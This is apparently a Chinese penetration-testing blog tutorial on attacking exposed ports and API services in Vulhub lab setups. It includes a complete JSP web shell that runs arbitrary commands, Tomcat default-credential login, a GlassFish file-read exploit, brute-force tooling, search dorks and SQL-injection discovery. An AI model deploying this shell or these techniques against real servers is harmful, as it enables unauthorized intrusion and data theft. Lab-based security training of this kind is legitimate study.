漏洞发现(四)API接口服务之漏洞探针类型利用修复

端口服务—针对开放端口进行攻击

一个服务器往往会运行很多服务,比如web数据库啊等,那么就会开放很多端口对外,我们可以根据不同的端口来构造不同的攻击,从而达到拿到目标服务器权限的目的。

常见端口攻击面总结

这里有师傅总结好了直接放上,我们一般是信息收集碰到什么具体端口,再具体查询如何利用

端口渗透总结 – FreeBuf网络安全行业门户

Vulhub靶场案例

Tomcat弱口令案例

对该ip扫描发现8080端口开放,且运行上面的中间件为Tomcat

图片[1]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

我们打开页面进行:

图片[2]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

进行管理时发现需要认证:

图片[3]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

这时可以进行bp抓包爆破弱口令,但是tomcat有个很知名的弱口令是tomcat/tomcat,我们尝试,成功登录。

图片[4]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

创建jsp木马文件:shell.jsp

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

生成war后缀文件:

图片[5]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

进行上传:

图片[6]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

连接后输入命令,拿到权限。

图片[7]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

GlassFish 任意文件读取漏洞

图片[8]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

发现4848端口开放

图片[9]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

发现是GlassFish中间件,查找nday,找到任意文件读取,payload:

图片[10]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

成功读到目标文件

图片[11]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

端口弱口令检测工具

该工具对常见端口服务进行弱口令爆破检测,检测是否存在弱口令,可以自定义字典。

下载地址:https://github.com/shack2/SNETCracker/releases/

图片[12]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

小tips

当我们进行目录扫描时候,比如我们的web文件目录为/var/wwwroot/drton1

域名为drton1 对应的ip为1.1.1.1

当进行目录扫描时我们填写扫描路径是域名drton1 我们扫描的当前路径为/var/wwwroot/drton1/xxx

当进行目录扫描时我们填写扫描路径是ip:1.1.1.1 我们扫描的当前路径为/var/wwwroot/xxx

如果此时在/wwwroot/目录下存在网站备份文件那么我们扫描域名是扫不到的,只能通过扫描ip来进行发现,所以实战时候ip也来扫一遍更妥

API服务—针对API服务进行攻击

详细知识漏洞发现:API 接口渗透测试 – 先知社区 (aliyun.com)

在测试的时候会发现很多接口,我们发现的原因一般是发现关键字等信息

如url里存在wsdl:

  • inurl:jws?wsdl
  • inurl:asmx?wsdl
  • inurl:aspx?wsdl
  • inurl:ascx?wsdl
  • inurl:ashx?wsdl
  • inurl:dll?wsdl
  • inurl:exe?wsdl
  • inurl:php?wsdl
  • inurl:pl?wsdl
  • inurl:?wsdl

我们此时再拿该网站丢到awvs进行web扫描进行常规安全测试即可。

图片[13]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

发现SQL注入

图片[14]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

发现具体注入字段:

图片[15]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

我们找到具体注入字段进行标记,然后丢入sqlmap进行测试即可

图片[16]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论